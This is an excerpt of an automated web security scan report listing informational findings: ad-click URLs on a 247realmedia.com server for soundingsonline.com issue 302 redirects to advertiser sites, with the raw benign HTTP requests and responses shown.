<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:22:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

20.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:33:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:20:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:20 GMT
Server: Apache/2.0.52 (Red Hat)
